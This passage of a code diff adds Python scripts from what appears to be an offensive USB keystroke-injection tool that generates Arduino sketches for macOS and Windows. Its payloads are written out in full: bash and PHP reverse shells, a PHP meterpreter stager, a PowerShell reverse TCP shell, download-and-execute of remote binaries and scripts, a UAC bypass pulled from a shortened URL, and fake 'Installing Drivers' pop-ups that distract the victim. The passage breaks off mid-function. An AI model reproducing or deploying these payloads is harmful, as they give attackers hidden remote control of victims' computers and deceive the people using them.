delay(500);\n" + buffer += "}\n" + buffer += "\n" + + buffer += "void closeTerminal(){\n" + buffer += " Keyboard.press(KEY_LEFT_GUI);\n" + buffer += " Keyboard.println(\"m\");\n" + buffer += " delay(150);\n" + buffer += " Keyboard.release(KEY_LEFT_GUI);\n" + buffer += " delay(100);\n" + buffer += " pressEnter();\n" + buffer += "}\n" + buffer += "\n" + + buffer += payload + + buffer += "void loop()\n" + buffer += "{\n" + buffer += "}\n" + + fileName = coreUtils.checkINO(fileName) + file = open(fileName,'w') + file.write(buffer) + file.close() + + print "\n\noutput written to " + fileName + raw_input("\nPress Enter to continue and return to Main Menu...") + coreUtils.clearScreen() + +def osxOption1(): + + done = False + looper = False + remoteIP="" + remotePort="" + fileName="" + + while looper != True: + + coreUtils.clearScreen() + print "********************************************************************************************" + print "* *" + print "* Persistent Bash Reverse Shell without NetCat *" + print "* This payload will initiate a Bash reverse shell without Netcat *" + print "* Options are: 1. remote IP 2. Listening Port *" + print "* *" + print "********************************************************************************************" + print "\n" + + menu = {} + menu['0'] = "Info" + menu['1'] = "Set IP address of the remote server" + menu['2'] = "Set the listening port of the remote server" + menu['3'] = "Set Arduino sketch filename" + menu['4'] = "Write Arduino sketch" + menu['42']= "Return to previous menu" + menu['99']= "Exit" + + options=menu.keys() + options.sort(key=int) + for entry in options: + print entry, menu[entry] + + print "\n\n" + if remoteIP != "": + print "IP of the remote server set to -> " + remoteIP + if remotePort != "": + print "Listening port on the remote server set to -> " + remotePort + if fileName != "": + print "Arduino filename set to -> " + fileName + + selection=raw_input("\nPlease Select: ") + + if selection =='1': + remoteIP = raw_input("Please enter the IP address of the remote server to connect to: ") + elif selection == '2': + remotePort = raw_input("Please enter the listening port on the remote server:") + elif selection == '3': + fileName = coreUtils.getFileName('reverseCmdOSX.ino') + elif selection == '4': + if done == False: + print "\nYou have not set all the options" + raw_input("Press Enter to return to the menu and set all the options") + else: + looper = True + elif selection == '42': + coreUtils.clearScreen() + break + elif selection == '99': + exit() + elif selection == '0': + nfoCore.osx1info() + else: + print "\n\n***That is not a valid option!***\n\n" + + if remoteIP != "" and remotePort != "" and fileName != "": + done = True + + if done == True and looper == True: + payload = "void ReverseShell(){\n" + payload += "Keyboard.println(\"nohup bash -c \\\"while true;do bash -i >& /dev/tcp/" +remoteIP+ "/" +remotePort+ " 0>&1 2>&1; sleep 1;done\\\" 1>/dev/null &\");\n" + payload += " pressEnter();\n" + payload += "}\n" + + payloadFunc = "ReverseShell();\n" + + osxWriteFile(fileName,payloadFunc, payload) + + + +def osxOption2(): + + done = False + looper = False + remoteIP="" + remotePort="" + fileName="" + + while looper != True: + + coreUtils.clearScreen() + print "********************************************************************************************" + print "* *" + print "* PHP Reverse Shell *" + print "* This payload will initiate a reverse shell via PHP, requires PHP *" + print "* Options are: 1. remote IP 2. Listening Port *" + print "* *" + print "********************************************************************************************" + print "\n" + + menu = {} + menu['0'] = "Info" + menu['1'] = "Set IP address of the remote server" + menu['2'] = "Set the listening port of the remote server" + menu['3'] = "Set Arduino sketch filename" + menu['4'] = "Write Arduino sketch" + menu['42']= "Return to previous menu" + menu['99']= "Exit" + + options=menu.keys() + options.sort(key=int) + for entry in options: + print entry, menu[entry] + + print "\n\n" + if remoteIP != "": + print "IP of the remote server set to -> " + remoteIP + if remotePort != "": + print "Listening port on the remote server set to -> " + remotePort + if fileName != "": + print "Arduino filename set to -> " + fileName + + selection=raw_input("\nPlease Select: ") + + if selection =='1': + remoteIP = raw_input("Please enter the IP address of the remote server to connect to: ") + elif selection == '2': + remotePort = raw_input("Please enter the listening port on the remote server:") + elif selection == '3': + fileName = coreUtils.getFileName('revShellPHP.ino') + elif selection == '4': + if done == False: + print "\nYou have not set all the options" + raw_input("Press Enter to return to the menu and set all the options") + else: + looper = True + elif selection == '42': + coreUtils.clearScreen() + break + elif selection == '99': + exit() + elif selection == '0': + nfoCore.osx2info() + else: + print "\n\n***That is not a valid option!***\n\n" + + if remoteIP != "" and remotePort != "" and fileName != "": + done = True + + if done == True and looper == True: + + payload = "void ReverseShell(){\n" + payload += "Keyboard.println(\"php -r '$sock=fsockopen(\\\""+remoteIP+"\\\","+remotePort+");exec(\\\"/bin/sh -i <&3 >&3 2>&3\\\");'\");\n" + payload += " pressEnter();\n" + payload += "}\n" + + payloadFunc = "ReverseShell();\n" + + osxWriteFile(fileName,payloadFunc, payload) + + +def osxOption3(): + + done = False + looper = False + remoteIP="" + remotePort="" + fileName="" + RCfile="" + + while looper != True: + + coreUtils.clearScreen() + print "********************************************************************************************" + print "* *" + print "* PHP Meterpreter Reverse TCP *" + print "* This payload will initiate a meterpreter/reverse_tcp via PHP, requires PHP *" + print "* Options are: 1. remote IP 2. Listening Port *" + print "* *" + print "********************************************************************************************" + print "\n" + + menu = {} + menu['0'] = "Info" + menu['1'] = "Set IP address of the remote server" + menu['2'] = "Set the listening port of the remote server" + menu['3'] = "Set Arduino sketch filename" + menu['4'] = "Set Metasploit RC File name" + menu['5'] = "Write Arduino sketch" + menu['42']= "Return to previous menu" + menu['99']= "Exit" + + options=menu.keys() + options.sort(key=int) + for entry in options: + print entry, menu[entry] + + print "\n\n" + if remoteIP != "": + print "IP of the remote server set to -> " + remoteIP + if remotePort != "": + print "Listening port on the remote server set to -> " + remotePort + if RCfile != "": + print "Metasploit RC File name set to -> " + RCfile + if fileName != "": + print "Arduino filename set to -> " + fileName + + selection=raw_input("\nPlease Select: ") + + if selection =='1': + remoteIP = raw_input("Please enter the IP address of the remote server to connect to: ") + elif selection == '2': + remotePort = raw_input("Please enter the listening port on the remote server:") + elif selection == '3': + fileName = coreUtils.getFileName('reverseMetPHP.ino') + elif selection == '4': + RCfile = coreUtils.getRCFileName('reverseMetPHP.rc') + + elif selection == '5': + if done == False: + print "\nYou have not set all the options" + raw_input("Press Enter to return to the menu and set all the options") + else: + looper = True + elif selection == '42': + coreUtils.clearScreen() + break + elif selection == '99': + exit() + elif selection == '0': + nfoCore.osx3info() + else: + print "\n\n***That is not a valid option!***\n\n" + + if remoteIP != "" and remotePort != "" and fileName != "" and RCfile !="": + done = True + + if done == True and looper == True: + payload = "void ReverseShell(){\n" + payload += "Keyboard.println(\"php -r 'error_reporting(0); $ip = \\\""+remoteIP+"\\\"; $port = "+remotePort+"; if (($f = \\\"stream_socket_client\\\") && is_callable($f)) { $s = $f(\\\"tcp://{$ip}:{$port}\\\");" + payload += " $s_type = \\\"stream\\\"; } elseif (($f = \\\"fsockopen\\\") && is_callable($f)) { $s = $f($ip, $port); $s_type = \\\"stream\\\"; } elseif (($f = \\\"socket_create\\\") && is_callable($f))" + payload += " { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = \\\"socket\\\"; } else { die(\\\"no socket funcs\\\"); } if (!$s) { die(\\\"no socket\\\");" + payload += " } switch ($s_type) { case \\\"stream\\\": $len = fread($s, 4); break; case \\\"socket\\\": $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack(\\\"Nlen\\\", $len); $len = $a[\\\"len\\\"];" + payload += " $b = \\\"\\\"; while (strlen($b) < $len) { switch ($s_type) { case \\\"stream\\\": $b .= fread($s, $len-strlen($b)); break; case \\\"socket\\\": $b .= socket_read($s, $len-strlen($b)); break;" + payload += " } } $GLOBALS[\\\"msgsock\\\"] = $s; $GLOBALS[\\\"msgsock_type\\\"] = $s_type; eval($b); die();'\");\n" + payload += " pressEnter();\n" + payload += "}\n" + + payloadFunc = "ReverseShell();\n" + + osxWriteFile(fileName,payloadFunc, payload) + coreUtils.msfRCfile(remoteIP,remotePort,'php/meterpreter/reverse_tcp',RCfile) diff --git a/winCore.py b/winCore.py new file mode 100644 index 0000000..4582ac2 --- /dev/null +++ b/winCore.py @@ -0,0 +1,1512 @@ +#!/usr/bin/python +#uses HID-Project.h from https://github.com/NicoHood/HID, can be installed from Arduino Library Manager + +import sys +import argparse +import os +import subprocess +import coreUtils +import nfoCore + +def WinBanner(): + + coreUtils.clearScreen() + print "********************************************************************************************" + print "* *" + print "* *" + print "* Windows Payloads *" + print "* These Payloads are made mostly for Windows 7, 8.1 and 10, as most use Powershell *" + print "* *" + print "********************************************************************************************" + print "\n" + +def WinMenu(): + + menu = {} + menu['1']="Download and Execute Binary for Windows" + menu['2']="Download and Execute Powershell for Windows" + menu['3']="Execute Custom Powershell script for Windows" + menu['4']="Reverse TCP CMD Powershell for Windows" + menu['5']="Add Administrator and Enable RDP for Windows" + menu['6']="Download and run Invoke-Mimikatz.ps1, Send output to Remote Server for Windows" + menu['7']="Change DNS Entry in Hostfile for Windows" + menu['8']="Download File and Place on Current User's Desktop for Windows" + menu['9']="Reverse TCP CMD prompt for Windows" + menu['10']="windows/meterpreter/reverse_https in Powershell for Windows" + menu['11']="Get username and computer name and send to a remote listener for Windows" + menu['42']="Return to main menu" + menu['99']="Exit" + + while True: + WinBanner() + options=menu.keys() + options.sort(key=int) + for entry in options: + print entry, menu[entry] + + selection=raw_input("\nPlease Select: ") + if selection =='1': + WinOption1() + elif selection == '2': + WinOption2() + elif selection == '3': + WinOption3() + elif selection == '4': + WinOption4() + elif selection == '5': + WinOption5() + elif selection == '6': + WinOption6() + elif selection == '7': + WinOption7() + elif selection == '8': + WinOption8() + elif selection == '9': + WinOption9() + elif selection == '10': + WinOption10() + elif selection == '11': + WinOption11() + elif selection == '42': + coreUtils.clearScreen() + break + elif selection == '99': + exit() + else: + print "\n\n***That is not a valid option!***\n\n" + +def notificationBubble(): + + title = "Installing Drivers" + message = "Please do not remove the device" + while True: + + answer = raw_input("Do you want to include a notifiction bubble as a distraction? Press Enter for default Yes (Y/n/?): ") + + if answer in ('Y','y','yes','Yes','YES'): + + while True: + print "\n" + print "Current notification bubble title is: " + title + print "Current notification bubble message is: " + message + + print "\n" + customize = raw_input("Do you want to change the notification bubble text? (Y/n):") + + if customize in ('Y','y','yes','Yes','YES',''): + print "\n" + title = raw_input("Please enter the Title of the notification bubble -> ") + message = raw_input("Please enter the Message of the notification bubble -> ") + + elif customize in ('N','n','no','No','NO',''): + + buffer = "void bubblePopup(){\n" + buffer += " Keyboard.println(\"wlrmdr.exe -s 60000 -f 1 -t \\\""+title+"\\\" -m \\\""+message+"\\\"\");\n" + buffer += " delay(100);\n" + buffer += " pressEnter();\n" + buffer += " delay(750);\n" + buffer += "}\n" + + setting = 'Enabled' + + return buffer, setting + + break + + elif answer in ('N','n','no','No','NO'): + buffer = "void bubblePopup(){\n" + buffer += "}\n" + + setting = 'Disabled' + return buffer, setting + + elif answer == '?': + nfoCore.bubbleInfo() + else: + print "\nThat is not a valid option, enabling the default option Notification Bubble" + buffer = "void bubblePopup(){\n" + buffer += " Keyboard.println(\"wlrmdr.exe -s 60000 -f 1 -t \\\"Installing Drivers\\\" -m \\\"Please do not remove the device\\\"\");\n" + buffer += " pressEnter();\n" + buffer += " delay(750);\n" + buffer += "}\n" + + setting = 'Enabled' + + return buffer, setting + + +def checkUACBypass(): + + while True: + + bypassUACoption = raw_input("Please select a bypass UAC method:\n 1. No UAC Bypass\n 2. https://goo.gl/fPl4tm for bypass(no UAC popup)\n 3. run As (UAC popup visable)\n ?. For more information\n Press Enter for default (None): ") + + if bypassUACoption == "": + bypassUACoption = "1" + bypassUAC = noBypass() + bypassType = "None" + return bypassType,bypassUAC + elif bypassUACoption == "1": + bypassUAC = noBypass() + bypassType = "None" + return bypassType,bypassUAC + elif bypassUACoption == "2": + bypassUAC = BypassUACExploit() + bypassType = "https://goo.gl/fPl4tm (no visible popup)" + return bypassType,bypassUAC + elif bypassUACoption == "3": + bypassUAC = BypassUACAdmin() + bypassType = "run As (visible popup)" + return bypassType,bypassUAC + elif bypassUACoption == '?': + nfoCore.UACBypassInfo() + else: + print "That is not a valid option, giving you the default option of None" + bypassUAC = noBypass() + bypassType = "None" + raw_input("\nPress Enter to return to the previous Menu...") + return bypassType,bypassUAC + +def noUAVBypass(): + + buffer ="void bypassUAC(){\n" + buffer +=" \n" + buffer +="}\n" + +def BypassUACExploit(): + + buffer = "void bypassUAC(){\n" + buffer +=" Keyboard.press(KEY_LEFT_GUI);\n" + buffer +=" Keyboard.press('r');\n" + buffer +=" delay(200);\n" + buffer += " Keyboard.release(KEY_LEFT_GUI);\n" + buffer += " Keyboard.release('r');\n" + buffer +=" Keyboard.println(\"cmd.exe /T:01 /K mode CON: COLS=15 LINES=1 && title Installing Drivers\");\n" + buffer +=" delay(1000);\n" + buffer +=" pressEnter();\n" + buffer +=" Keyboard.println(\"powershell -NoP -NonI -W Hidden -Exec Bypass \\\"IEX (New-Object System.Net.WebClient).DownloadString(\'https://goo.gl/fPl4tm\');Bypass-UAC -Method ucmDismMethod;\\\"\");\n" + buffer +=" pressEnter();\n" + buffer +=" delay(1750);\n" + buffer +="}\n" + + return(buffer) + +def noBypass(): + + buffer = "void bypassUAC(){\n" + buffer += " Keyboard.press(KEY_LEFT_GUI);\n" + buffer += " Keyboard.press('r');\n" + buffer += " delay(200);\n" + buffer += " Keyboard.release(KEY_LEFT_GUI);\n" + buffer += " Keyboard.release('r');\n" + buffer += " delay(100);\n" + buffer += " Keyboard.println(\"cmd.exe /T:01 /K mode CON: COLS=15 LINES=1 && title Installing Drivers\");\n" + buffer += " delay(100);\n" + buffer += " pressEnter();\n" + buffer += " delay(500);\n" + buffer += "}\n" + + return(buffer) + +def BypassUACAdmin(): + + buffer = "void bypassUAC(){\n" + buffer += " Keyboard.press(KEY_LEFT_GUI);\n" + buffer += " Keyboard.press('r');\n" + buffer += " delay(200);\n" + buffer += " Keyboard.release(KEY_LEFT_GUI);\n" + buffer += " Keyboard.release('r');\n" + buffer += " delay(100);\n" + buffer += " Keyboard.println(\"powershell Start-Process cmd.exe -Verb runAs\");\n" + buffer += " delay(100);\n" + buffer += " pressEnter();\n" + buffer += " delay(1000);\n" + buffer += "\n" + buffer += " Keyboard.press(KEY_LEFT_ALT);\n" + buffer += " delay(100);\n" + buffer += " Keyboard.println(\"Y\");\n" + buffer += " Keyboard.release(KEY_LEFT_ALT);\n" + buffer += " delay(500);\n" + buffer += "\n" + buffer += " Keyboard.println(\"cmd.exe /T:01 /K mode CON: COLS=15 LINES=1 && title Installing Drivers\");\n" + buffer += " delay(100);\n" + buffer += " pressEnter();\n" + buffer += " delay(200);\n" + buffer += "}\n" + + return (buffer) + +def WinWriteFile(fileName,payloadFunc,bypassUAC,payload, bubble): + + buffer = "//This Arduino Sketch was generated with the OrbitUSB tool, located here: https://github.com/ChandraOrbit/OverOrbitUSB\n\n" + buffer += "#include \n" + buffer += "void setup() {\n" + buffer += " Keyboard.begin();\n" + buffer += " hurryUp();\n" + buffer += " killCaps();\n" + buffer += " bypassUAC();\n" + buffer += " bubblePopup();\n" + buffer += " //THIS DELAY IS IMPORTANT, AND MAY NEED TO BE MODIFIED FOR YOUR TARGET\n" + buffer += " delay(1000);\n" + + buffer += " " + payloadFunc + + buffer += " Keyboard.end();\n" + buffer += "}\n" + + buffer += "void pressEnter(){\n" + buffer += " Keyboard.press(KEY_RETURN);\n" + buffer += " delay(100);\n" + buffer += " Keyboard.release(KEY_RETURN);\n" + buffer += "}\n" + + buffer += "void hurryUp(){\n" + buffer += " boolean areWeThereYet = capsCheck();\n" + buffer += " while (areWeThereYet == capsCheck()){\n" + buffer += " hitCaps();\n" + buffer += " }\n" + buffer += " hitCaps();\n" + buffer += "}\n" + buffer += "\n" + + buffer += "boolean capsCheck(){\n" + buffer += " if (BootKeyboard.getLeds() & LED_CAPS_LOCK){\n" + buffer += " return true;\n" + buffer += " }\n" + buffer += " else{\n" + buffer += " return false;\n" + buffer += " }\n" + buffer += "}\n" + buffer += "\n" + + buffer += "void hitCaps(){\n" + buffer += " Keyboard.press(KEY_CAPS_LOCK);\n" + buffer += " delay(100);\n" + buffer += " Keyboard.release(KEY_CAPS_LOCK);\n" + buffer += "}\n" + buffer += "\n" + + buffer += "void killCaps(){\n" + buffer += " if (capsCheck())\n" + buffer += " {\n" + buffer += " hitCaps();\n" + buffer += " }\n" + buffer += "}\n" + buffer += "\n" + + buffer += bypassUAC + + buffer += bubble + + buffer += payload + + buffer += "void loop()\n" + buffer += "{\n" + buffer += "}\n" + + fileName = coreUtils.checkINO(fileName) + file = open(fileName,'w') + file.write(buffer) + file.close() + + print "\n\noutput written to " + fileName + raw_input("\nPress Enter to continue and return to Main Menu...") + coreUtils.clearScreen() + + +def WinOption1(): + + done = False + looper = False + URL="" + fileName="" + bypassUACoption="" + bubbleSetting="" + + while looper != True: + + coreUtils.clearScreen() + print "********************************************************************************************" + print "* *" + print "* Download and Execute Binary for Windows *" + print "* This payload will download a binary and execute it, then close the powershell prompt *" + print "* Options are: 1. The URL 2. The binary name 3. How to bypass UAC 4. The output File name *" + print "* *" + print "********************************************************************************************" + print "\n" + + menu = {} + menu['0'] = "Info" + menu['1'] = "Set URL of the binary to download and execute" + menu['2'] = "Set bypassUAC mode" + menu['3'] = "Set Arduino sketch filename" + menu['4'] = "Set notification bubble option" + menu['5'] = "Write Arduino sketch" + menu['42']= "Return to previous menu" + menu['99']= "Exit" + + options=menu.keys() + options.sort(key=int) + for entry in options: + print entry, menu[entry] + + print "\n\n" + if URL != "": + print "URL of binary set to -> " + URL + if bypassUACoption != "": + print "bypassUAC technique set to -> " + bypassUACoption + if bubbleSetting != "": + print "Notification bubble set to -> " + bubbleSetting + if fileName != "": + print "Arduino filename set to -> " + fileName + + selection=raw_input("\nPlease Select: ") + + if selection =='1': + URL = raw_input("Please enter the full URL of the binary (please include \"http://\" or \"https://\"): ") + binary = coreUtils.getBinary(URL) + elif selection == '2': + bypassUACoption,bypassUAC = checkUACBypass() + elif selection == '3': + fileName = coreUtils.getFileName('dropBinary.ino') + elif selection == '4': + bubble, bubbleSetting = notificationBubble() + elif selection == '5': + if done == False: + print "\nYou have not set all the options" + raw_input("Press Enter to return to the menu and set all the options") + else: + looper = True + elif selection == '42': + coreUtils.clearScreen() + break + elif selection == '99': + exit() + elif selection == '0': + nfoCore.Win1info() + else: + print "\n\n***That is not a valid option!***\n\n" + + if URL != "" and fileName != "" and bypassUACoption != "" and bubbleSetting != "": + done = True + + if done == True and looper == True: + payload = "void downBinary(){\n" + if bypassUACoption != "https://goo.gl/fPl4tm (no visible popup)": + payload += " Keyboard.println(\"cd\\\\users\\\\%USERNAME%\");\n" + payload += " delay(100);\n" + payload += " pressEnter();\n" + if bypassUACoption == "https://goo.gl/fPl4tm (no visible popup)": + payload += " Keyboard.println(\"powershell -w hidden \\\"$source = '" +URL+ "\'; $destination = '" +binary+ "'; Invoke-WebRequest $source -OutFile $destination;start-process '" +binary+"';exit;\\\"\");\n" + else: + payload += " Keyboard.println(\"powershell -w hidden \\\"$source = '" +URL+ "\'; $destination = '" +binary+ "'; Invoke-WebRequest $source -OutFile $destination;start-process '" +binary+"';exit;\\\"\");\n" + payload += " delay(100);\n" + payload += " pressEnter();\n" + + + if bypassUACoption == "run As (visible popup)": + payload += " Keyboard.println(\"exit\");\n" + payload += " delay(100);\n" + payload += " pressEnter();\n" + payload += " Keyboard.println(\"exit\");\n" + payload += " delay(100);\n" + payload += " pressEnter();\n" + elif bypassUACoption == "None": + payload += " Keyboard.println(\"exit\");\n" + payload += " delay(100);\n" + payload += " pressEnter();\n" + payload += "}\n" + + + payloadFunc = "downBinary();\n" + + WinWriteFile(fileName,payloadFunc,bypassUAC,payload,bubble) + + + + +def WinOption2(): + + done = False + looper = False + URL="" + fileName="" + bypassUACoption="" + bubbleSetting="" + + while looper != True: + + coreUtils.clearScreen() + print "********************************************************************************************" + print "* *" + print "* Download and Execute Powershell for Windows *" + print "* This payload will download a powershell script then run it *" + print "* Options are: 1. The URL 2. The script name 3. How to bypass UAC 4. The output File name *" + print "* *" + print "********************************************************************************************" + print "\n" + + menu = {} + menu['0'] = "Info" + menu['1'] = "Set URL of the powershell script to download and execute" + menu['2'] = "Set bypassUAC mode" + menu['3'] = "Set Arduino sketch filename" + menu['4'] = "Set notification bubble option" + menu['5'] = "Write Arduino sketch" + menu['42']= "Return to previous menu" + menu['99']= "Exit" + + options=menu.keys() + options.sort(key=int) + for entry in options: + print entry, menu[entry] + + print "\n\n" + if URL != "": + print "URL of Powershell script set to -> " + URL + if bypassUACoption != "": + print "bypassUAC technique set to -> " + bypassUACoption + if bubbleSetting != "": + print "Notification bubble set to -> " + bubbleSetting + if fileName != "": + print "Arduino filename set to -> " + fileName + + selection=raw_input("\nPlease Select: ") + + if selection =='1': + URL = raw_input("Please enter the full URL of the Powershell script (please include \"http://\" or \"https://\"): ") + scriptName = coreUtils.getBinary(URL) + elif selection == '2': + bypassUACoption,bypassUAC = checkUACBypass() + elif selection == '3': + fileName = coreUtils.getFileName('downPSH.ino') + elif selection == '4': + bubble, bubbleSetting = notificationBubble() + elif selection == '5': + if done == False: + print "\nYou have not set all the options" + raw_input("Press Enter to return to the menu and set all the options") + else: + looper = True + elif selection == '42': + coreUtils.clearScreen() + break + elif selection == '99': + exit() + elif selection == '0': + nfoCore.Win2info() + else: + print "\n\n***That is not a valid option!***\n\n" + + if URL != "" and fileName != "" and bypassUACoption != "" and bubbleSetting != "": + done = True + + if done == True and looper == True: + + payload = "void downExecPSH(){\n" + payload += " Keyboard.println(\"powershell -w hidden \\\"IEX (New-Object Net.WebClient).DownloadString(\'" +URL+ "\');" + scriptName + ";exit;\\\"\");\n" + payload += " pressEnter();\n" + if bypassUACoption == "run As (visible popup)": + payload += " Keyboard.println(\"exit\");\n" + payload += " delay(100);\n" + payload += " pressEnter();\n" + payload += " Keyboard.println(\"exit\");\n" + payload += " delay(100);\n" + payload += " pressEnter();\n" + elif bypassUACoption == "None": + payload += " Keyboard.println(\"exit\");\n" + payload += " delay(100);\n" + payload += " pressEnter();\n" + payload += "}\n" + + payloadFunc = "downExecPSH();\n" + + WinWriteFile(fileName,payloadFunc,bypassUAC,payload,bubble) + +def WinOption3(): + + done = False + looper = False + powershell = "" + fileName="" + bypassUACoption="" + bubbleSetting="" + + while looper != True: + + coreUtils.clearScreen() + print "********************************************************************************************" + print "* *" + print "* Execute Custom Powershell script for Windows *" + print "* This payload will run custom powershell script *" + print "* Options are: 1. Powershell code 2. The output File name *" + print "* *" + print "********************************************************************************************" + print "\n" + + menu = {} + menu['0'] = "Info" + menu['1'] = "Set powershell script to execute" + menu['2'] = "Set bypassUAC mode" + menu['3'] = "Set Arduino sketch filename" + menu['4'] = "Set notification bubble option" + menu['5'] = "Write Arduino sketch" + menu['6'] = "Display powershell script" + menu['42']= "Return to previous menu" + menu['99']= "Exit" + + options=menu.keys() + options.sort(key=int) + for entry in options: + print entry, menu[entry] + + print "\n\n" + if powershell != "": + print "powershell script is set" + if bypassUACoption != "": + print "bypassUAC technique set to -> " + bypassUACoption + if bubbleSetting != "": + print "Notification bubble set to -> " + bubbleSetting + if fileName != "": + print "Arduino filename set to -> " + fileName + + selection=raw_input("\nPlease Select: ") + + if selection =='1': + powershell = raw_input("\"powershell -nop -w hidden\" will automatically be added to the payload\nPlease add \"-enc\" at the beginning if your script is fully encoded\nPlease input your powershell script: ") + powershell = coreUtils.checkQuotes(powershell) + elif selection == '2': + bypassUACoption,bypassUAC = checkUACBypass() + elif selection == '3': + fileName = coreUtils.getFileName('powershell.ino') + elif selection == '4': + bubble, bubbleSetting = notificationBubble() + elif selection == '5': + if done == False: + print "\nYou have not set all the options" + raw_input("Press Enter to return to the menu and set all the options") + else: + looper = True + elif selection == '6': + if powershell == "": + print "you have not entered a powershell script yet" + raw_input("Please press enter to continue") + coreUtils.clearScreen() + else: + print "Powershell script set as -> " +powershell + raw_input("Please press enter to continue") + elif selection == '42': + coreUtils.clearScreen() + break + elif selection == '99': + exit() + elif selection == '0': + nfoCore.Win3info() + else: + print "\n\n***That is not a valid option!***\n\n" + + if powershell != "" and fileName != "" and bypassUACoption != "" and bubbleSetting != "": + done = True + + if done == True and looper == True: + + payload = "void powershell(){\n" + payload += " Keyboard.println(\"powershell -nop -w hidden " + powershell + "\");\n" + payload += " pressEnter();\n" + payload += " Keyboard.println(\"exit\");\n" + payload += " delay(100);\n" + payload += " pressEnter();\n" + payload += "}\n" + + payloadFunc = "powershell();\n" + + + WinWriteFile(fileName, payloadFunc,bypassUAC,payload,bubble) + +def WinOption4(): + + done = False + looper = False + remoteIP="" + remotePort = "" + fileName="" + bypassUACoption="" + bubbleSetting="" + + while looper != True: + + coreUtils.clearScreen() + print "********************************************************************************************" + print "* *" + print "* Reverse TCP CMD in Powershell for Windows *" + print "* This payload will create a Reverse TCP CMD Prompt via Powershell *" + print "* Options are: 1. The IP 2. The listening port 3. The output File name *" + print "* *" + print "********************************************************************************************" + print "\n" + + menu = {} + menu['0'] = "Info" + menu['1'] = "Set the remote IP of the listening server" + menu['2'] = "Set the remote Port of the listening server" + menu['3'] = "Set bypassUAC mode" + menu['4'] = "Set Arduino sketch filename" + menu['5'] = "Set notification bubble option" + menu['6'] = "Write Arduino sketch" + menu['42']= "Return to previous menu" + menu['99']= "Exit" + + options=menu.keys() + options.sort(key=int) + for entry in options: + print entry, menu[entry] + + print "\n\n" + if remoteIP != "": + print "IP of the remote server is set to -> " + remoteIP + if remotePort != "": + print "The listening port of the remote server is -> " + remotePort + if bypassUACoption != "": + print "bypassUAC technique set to -> " + bypassUACoption + if bubbleSetting != "": + print "Notification bubble set to -> " + bubbleSetting + if fileName != "": + print "Arduino filename set to -> " + fileName + + selection=raw_input("\nPlease Select: ") + + if selection =='1': + remoteIP = raw_input("Please enter the IP of the remote server: ") + elif selection == '2': + remotePort = raw_input("Please enter the listening port of the remote server: ") + elif selection == '3': + bypassUACoption,bypassUAC = checkUACBypass() + elif selection == '4': + fileName = coreUtils.getFileName('reverseTCP.ino') + elif selection == '5': + bubble, bubbleSetting = notificationBubble() + elif selection == '6': + if done == False: + print "\nYou have not set all the options" + raw_input("Press Enter to return to the menu and set all the options") + else: + looper = True + elif selection == '42': + coreUtils.clearScreen() + break + elif selection == '99': + exit() + elif selection == '0': + nfoCore.Win4info() + else: + print "\n\n***That is not a valid option!***\n\n" + + if remoteIP != "" and remotePort != "" and fileName != "" and bypassUACoption != "" and bubbleSetting != "": + done = True + + if done == True and looper == True: + payload = "void reverseTCP(){\n" + if bypassUACoption == "https://goo.gl/fPl4tm (no visible popup)": + payload += " Keyboard.println(\"$client = New-Object System.Net.Sockets.TCPClient('" + remoteIP + "'," + remotePort + ");$stream = $client.GetStream();" + else: + payload += " Keyboard.println(\"powershell -w Hidden \\\"$client = New-Object System.Net.Sockets.TCPClient('" + remoteIP + "'," + remotePort + ");$stream = $client.GetStream();" + payload += "[byte[]]$bytes = 0..255|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);" + payload += "$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);" + if bypassUACoption == "https://goo.gl/fPl4tm (no visible popup)": + payload += "$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();\");\n" + else: + payload += "$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();\\\"\");\n" + payload += " pressEnter();\n" + if bypassUACoption == "run As (visible popup)": + payload += " Keyboard.println(\"exit\");\n" + payload += " delay(100);\n" + payload += " pressEnter();\n" + payload += " Keyboard.println(\"exit\");\n" + payload += " delay(100);\n" + payload += " pressEnter();\n" + elif bypassUACoption == "None": + payload += " Keyboard.println(\"exit\");\n" + payload += " delay(100);\n" + payload += " pressEnter();\n" + payload += "}\n" + + payloadFunc = "reverseTCP();\n" + + WinWriteFile(fileName,payloadFunc,bypassUAC, payload,bubble) + + +def WinOption5(): + + done = False + looper = False + userName="" + userPass="" + fileName="" + bypassUACoption="" + bubbleSetting="" + + while looper != True: + + coreUtils.clearScreen() + print "********************************************************************************************" + print "* *" + print "* Add Administrator and Enable RDP for Windows *" + print "* This payload will add a user, then add the user to the Administrator Group and RDP Group *" + print "* Options are: 1. UserName 2. Password 3. How to bypass UAC 4. The output File name *" + print "* *" + print "********************************************************************************************" + print "\n" + + menu = {} + menu['0'] = "Info" + menu['1'] = "Set username to add" + menu['2'] = "Set username password" + menu['3'] = "Set bypassUAC mode" + menu['4'] = "Set Arduino sketch filename" + menu['5'] = "Set notification bubble option" + menu['6'] = "Write Arduino sketch" + menu['42']= "Return to previous menu" + menu['99']= "Exit" + + options=menu.keys() + options.sort(key=int) + for entry in options: + print entry, menu[entry] + + print "\n\n" + if userName != "": + print "username set to -> " + userName + if userPass != "": + print "user password set to -> " + userPass + if bypassUACoption != "": + print "bypassUAC technique set to -> " + bypassUACoption + if bubbleSetting != "": + print "Notification bubble set to -> " + bubbleSetting + if fileName != "": + print "Arduino filename set to -> " + fileName + + selection=raw_input("\nPlease Select: ") + + if selection =='1': + userName = raw_input("Please enter the username to add to the admin group: ") + elif selection == '2': + userPass = raw_input("Please enter the password for the new user: ") + elif selection == '3': + bypassUACoption,bypassUAC = checkUACBypass() + elif selection == '4': + fileName = coreUtils.getFileName('addAdmin.ino') + elif selection == '5': + bubble, bubbleSetting = notificationBubble() + elif selection == '6': + if done == False: + print "\nYou have not set all the options" + raw_input("Press Enter to return to the menu and set all the options") + else: + looper = True + elif selection == '42': + coreUtils.clearScreen() + break + elif selection == '99': + exit() + elif selection == '0': + nfoCore.Win5info() + else: + print "\n\n***That is not a valid option!***\n\n" + + if userName != "" and userPass != "" and fileName != "" and bypassUACoption != "" and bubbleSetting != "": + done = True + + if done == True and looper == True: + payload = "void addUser(){\n" + payload += " 